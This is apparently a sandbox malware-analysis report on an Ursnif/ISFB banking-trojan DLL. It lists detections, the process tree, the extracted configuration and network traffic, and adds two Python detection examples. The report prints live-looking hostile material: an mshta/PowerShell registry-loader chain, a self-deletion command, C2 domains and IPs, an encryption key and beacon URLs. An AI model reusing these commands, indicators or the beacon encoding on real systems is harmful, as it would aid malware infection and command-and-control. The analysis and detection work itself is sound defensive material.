
Windows Analysis Report
xaj0e933Uv.dll

Overview

General Information

Sample Name: xaj0e933Uv.dll
Analysis ID: 620332
MD5: 69e570a35f63ea12cbad7a10b25a6ea4
SHA1: f0ca60563eeb9098ad6133daa1fc48c3987437e2
SHA256: 3362915be3f3ed1572f4ba757d155608f54a460fd935bfe3f37138cf0fe383b6
Tags: dll, geo, Gozi, ISFB, ITA, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1900 cmdline: loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5132 cmdline: rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4084 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 5716 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 3504 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 6592 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • mshta.exe (PID: 6548 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6924 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7144 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup
Malware Configuration (Ursnif)

RSA Public Key: WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=
c2_domain: config.edge.skype.com, cabrioxmdes.at, gamexperts.net, 185.189.151.181, 185.189.151.186
ip_check_url: http://ipinfo.io/ip, http://curlmyip.net
serpent_key: Jv1GYc8A8hCBIeVD
tor32_dll: file://c:\test\test32.dll
tor64_dll: file://c:\test\tor64.dll
server: 50
sleep_time: 1
SetWaitableTimer_value(CRC_CONFIGTIMEOUT): 60
time_value: 60
SetWaitableTimer_value(CRC_TASKTIMEOUT): 60
SetWaitableTimer_value(CRC_SENDTIMEOUT): 300
SetWaitableTimer_value(CRC_KNOCKERTIMEOUT): 60
not_use(CRC_BCTIMEOUT): 10
botnet: 3000
SetWaitableTimer_value: 1
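The process tree above is the part of this report a detection engineer will reuse: mshta.exe is started with an inline HTA whose script is pulled from the registry value HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E\TestLocal through WScript.Shell.RegRead; that stage runs PowerShell, which hides Get-ItemProperty and Invoke-Expression behind the throwaway aliases axgpbo and slctai and executes the UrlsReturn value of the same key; PowerShell then drives csc.exe to compile C# at runtime; the injected explorer.exe uses ping localhost -n 5 as a timer before deleting the dropped DLL and runs nslookup myip.opendns.com to learn the external address; and control.exe -h, spawned by rundll32.exe, sits between rundll32.exe and the injected explorer.exe in the tree. The Python below is an added example written for this page, not Joe Sandbox's or the sample's code: it turns those features into process-creation rules and runs them over events transcribed from the tree plus one constructed benign event. Rule names, the ProcEvent shape and the regular expressions are this example's own choices; the parent of mshta.exe is left blank because the tree does not show it.

```python
"""Rule checks for the process chain in this report (added example, not Joe Sandbox code).

Events are transcribed from the report's process tree; the last one is a constructed
benign control. Rule names and patterns are this example's own.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # executable basename
    parent_image: str   # parent's executable basename ("" where the report does not show it)
    cmdline: str


EVENTS = [
    ProcEvent(5132, "rundll32.exe", "cmd.exe",
              r'rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1'),
    ProcEvent(4084, "control.exe", "rundll32.exe", r"C:\Windows\system32\control.exe -h"),
    ProcEvent(5716, "cmd.exe", "explorer.exe",
              r'C:\Windows\System32\cmd.exe /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll"'),
    ProcEvent(6592, "cmd.exe", "explorer.exe",
              r'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1"'),
    ProcEvent(6548, "mshta.exe", "",
              r'''C:\Windows\System32\mshta.exe "about:<hta:application><script>Jqlc='wscript.shell';'''
              r'''resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow'''
              r'''\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));'''
              r'''if(!window.flag)close()</script>"'''),
    ProcEvent(6644, "powershell.exe", "mshta.exe",
              r'powershell.exe new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; '
              r'slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo '
              r'"HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'),
    ProcEvent(6924, "csc.exe", "powershell.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline"'),
    ProcEvent(9001, "cmd.exe", "explorer.exe", "cmd.exe /C ping 10.0.0.1 -n 1"),  # constructed benign
]


def _p(pattern):
    return re.compile(pattern, re.IGNORECASE)


# Each rule: (name, required image or None, required parent image or None, command-line pattern or None)
RULES = [
    # inline HTA handed to mshta that fetches its real script from the registry
    ("mshta_inline_hta_regread", "mshta.exe", None,
     _p(r"about:<hta:application>.*\.regread\(")),
    # Invoke-Expression hidden behind a throwaway alias, fed from the ISFB registry key
    ("powershell_alias_iex_registry_stage", "powershell.exe", None,
     _p(r"new-alias\s+-name\s+\S+\s+-value\s+iex\b.*Software\\AppDataLow\\Software\\Microsoft\\")),
    # ping used purely as a delay before deleting the original payload
    ("ping_sleep_then_self_delete", "cmd.exe", None,
     _p(r"\bping\s+(localhost|127\.0\.0\.1)\s+-n\s+\d+\s*&&\s*del\b")),
    # external IP discovery through OpenDNS, written to a temp file for the bot to read
    ("opendns_myip_lookup", None, None,
     _p(r"nslookup\s+myip\.opendns\.com\s+resolver1\.opendns\.com")),
    # control.exe -h spawned by rundll32: the hop between rundll32 and explorer in this report
    ("control_exe_from_rundll32", "control.exe", "rundll32.exe", _p(r"\s-h\b")),
    # csc.exe under powershell: Add-Type style runtime compilation of C#
    ("csc_spawned_by_powershell", "csc.exe", "powershell.exe", None),
]


def evaluate(events):
    """Return {pid: [names of rules that fired]} for every event matching at least one rule."""
    hits = {}
    for ev in events:
        fired = []
        for name, image, parent, pattern in RULES:
            if image is not None and ev.image.lower() != image:
                continue
            if parent is not None and ev.parent_image.lower() != parent:
                continue
            if pattern is not None and not pattern.search(ev.cmdline):
                continue
            fired.append(name)
        if fired:
            hits[ev.pid] = fired
    return hits


if __name__ == "__main__":
    for pid, names in evaluate(EVENTS).items():
        print(pid, ", ".join(names))
```

Run it to print the PID-to-rule mapping. In a real pipeline the ProcEvent records would come from Sysmon Event ID 1 or an EDR's process-creation telemetry; the control.exe and csc.exe rules are deliberately scoped to their parent image, since either executable on its own is common on a workstation.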
Source | Rule | Description | Author
00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(21 further entries not shown)
Source | Rule | Description | Author
2.3.rundll32.exe.50494a0.10.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.5596b40.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.5596b40.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.55694a0.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.2.rundll32.exe.3430000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(4 further entries not shown)
                      No Sigma rule has matched
Snort IDS alerts:
Timestamp: 05/04/22-16:27:54.122082 | SID: 2033203 | Source Port: 49769 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:27:53.231327 | SID: 2033203 | Source Port: 49769 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:27:53.642851 | SID: 2033203 | Source Port: 49769 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:27:33.120656 | SID: 2033203 | Source Port: 49760 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected

                      AV Detection

Source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: Ursnif (the configuration listed after the process tree above)
Source: xaj0e933Uv.dll | Virustotal: Detection: 40%
Source: xaj0e933Uv.dll | ReversingLabs: Detection: 47%
Source: xaj0e933Uv.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03435FBB CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, memcpy, CryptEncrypt, CryptDecrypt, GetLastError, GetLastError, CryptDestroyKey, GetLastError, CryptReleaseContext, GetLastError
Source: xaj0e933Uv.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: Q5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb@ source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: xaj0e933Uv.dll
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.pdb source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Q5.pdb source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb( source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348BAD1 lstrlenW, lstrlenW, lstrlenW, memset, FindFirstFileW, lstrlenW, lstrlenW, memset, wcscpy, PathFindFileNameW, RtlEnterCriticalSection, RtlLeaveCriticalSection, lstrlenW, FindNextFileW, WaitForSingleObject, FindClose, FindFirstFileW, lstrlenW, FindNextFileW, WaitForSingleObject, FindClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034799BC lstrlenW, FindFirstFileW, lstrlenW, RemoveDirectoryW, DeleteFileW, FindNextFileW, GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034765C2 FindFirstFileW, lstrlenW, lstrlenW, lstrcpyW, lstrlenW, lstrcpyW, lstrcpyW, FindNextFileW, FindClose, FreeLibrary
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347FD47 wcscpy, wcscpy, GetLogicalDriveStringsW, GetLogicalDriveStringsW, RtlAllocateHeap, memset, GetLogicalDriveStringsW, WaitForSingleObject, GetDriveTypeW, lstrlenW, wcscpy, lstrlenW, HeapFree

                      Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.189.151.28 80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49760 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49760 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49769 -> 185.189.151.28:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49769 -> 185.189.151.28:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View | ASN Name: AS-SOFTPLUSCH
Source: global traffic | HTTP traffic detected: GET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 185.189.151.28 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 185.189.151.28 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 185.189.151.28 | Connection: Keep-Alive | Cache-Control: no-cache
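The Snort hits above come from ET rules whose names say what they key on: the "_2B" (M1) and "_2F" (M2) tokens in the request path. ISFB base64-encodes its encrypted request data, writes "+" as "_2B" and "/" as "_2F", and breaks the result into slash-separated segments under a short directory name (/drew/ here) with a fake file extension (.jlk), which is why the three GET requests look like deep static paths. Note that the first two alerts target 13.107.43.16, which the report does not resolve to a name but which, given the memory string http://config.edge.skype.com/drew/... and the c2_domain list, is most likely the legitimate Microsoft host config.edge.skype.com; any block should be built on the 185.189.151.x addresses, not on that domain. The Python below is an added example, not the report's or the sample's code: it checks a path for that structure and reverses the transformation to recover the still-encrypted request bytes (Serpent-encrypted with the configuration's serpent_key; decryption is not attempted). The directory and extension handling, the minimum path depth, and re-adding stripped base64 padding are this example's assumptions; the known-answer vector is constructed.

```python
"""Ursnif/ISFB beacon URI structure: detection and de-obfuscation (added example)."""
import base64
import binascii
import re
from typing import Optional

# /<dir>/<chunk>/<chunk>/.../<chunk>.<ext>; the chunks are base64 text in which the sender
# replaced '+' with '_2B' and '/' with '_2F' (the tokens named in ET 2033203/2033204) and
# then inserted '/' separators to fake a directory hierarchy.
_PATH_RE = re.compile(r"^/(?P<dir>[A-Za-z0-9]+)/(?P<body>[A-Za-z0-9_/]+)\.(?P<ext>[A-Za-z0-9]{2,4})$")
_TOKEN_RE = re.compile(r"_2B|_2F")
_B64_RE = re.compile(r"[A-Za-z0-9]+")


def has_ursnif_uri_structure(path: str, min_depth: int = 4) -> bool:
    """Structural check suitable for a proxy log: a deep path of base64-looking segments
    containing at least one escaped '+' or '/', and nothing outside the base64 alphabet
    once separators and escapes are removed. min_depth is this example's threshold."""
    m = _PATH_RE.match(path)
    if not m:
        return False
    body = m.group("body")
    if body.count("/") + 1 < min_depth:
        return False
    flat = body.replace("/", "")          # separators may split an escape, so join first
    if not _TOKEN_RE.search(flat):
        return False
    return _B64_RE.fullmatch(_TOKEN_RE.sub("", flat)) is not None


def decode_ursnif_uri(path: str) -> Optional[bytes]:
    """Reverse the transformation and return the request blob, which is still encrypted
    (Serpent with the configuration's serpent_key; not attempted here). Returns None when
    the structure check fails or the recovered text is not valid base64.
    Assumption: the sender stripped base64 padding, so it is re-added from the length."""
    if not has_ursnif_uri_structure(path):
        return None
    flat = _PATH_RE.match(path).group("body").replace("/", "")
    b64 = flat.replace("_2B", "+").replace("_2F", "/")
    if "_" in b64:                        # an escape this example does not model
        return None
    b64 += "=" * (-len(b64) % 4)
    try:
        return base64.b64decode(b64, validate=True)
    except binascii.Error:
        return None


def encode_ursnif_uri(data: bytes, directory: str = "drew", ext: str = "jlk", chunk: int = 7) -> str:
    """Forward transformation, used to build a known-answer vector for the decoder. Real
    traffic varies the separator positions; fixed-size chunks are this example's choice."""
    b64 = base64.b64encode(data).decode().rstrip("=")
    escaped = b64.replace("+", "_2B").replace("/", "_2F")
    parts = [escaped[i:i + chunk] for i in range(0, len(escaped), chunk)]
    return f"/{directory}/" + "/".join(parts) + f".{ext}"


# Constructed test vector: the first three bytes base64-encode to "+/+/", so both escapes appear.
SAMPLE_BLOB = b"\xfb\xff\xbf" + b"constructed test payload"

# Request paths copied from this report's HTTP traffic section.
REPORT_PATHS = [
    "/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk",
    "/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk",
    "/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk",
]

if __name__ == "__main__":
    url = encode_ursnif_uri(SAMPLE_BLOB)
    print(url)
    print("round trip ok:", decode_ursnif_uri(url) == SAMPLE_BLOB)
    for p in REPORT_PATHS:
        blob = decode_ursnif_uri(p)
        print(has_ursnif_uri_structure(p), None if blob is None else len(blob), p[:48] + "...")
```

Running the block prints the constructed vector, its round trip, and the structure result for the report's three paths. Whether decoding the report's own paths yields bytes depends on how the sender handled base64 padding, which this page does not show, so the example treats structure as the detection signal and proves the full round trip only on the constructed vector.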
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 (this entry is repeated 50 times in the report)
Source: rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/
Source: rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2
Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2
Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343411047.0000000003337000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGS
Source: rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/CXrN03_2FVmE00A0jBbCC/p4SMYAv6bGfrxOGb/gRNWHNhEtgY8LT7/5NqawS2a2mm
Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
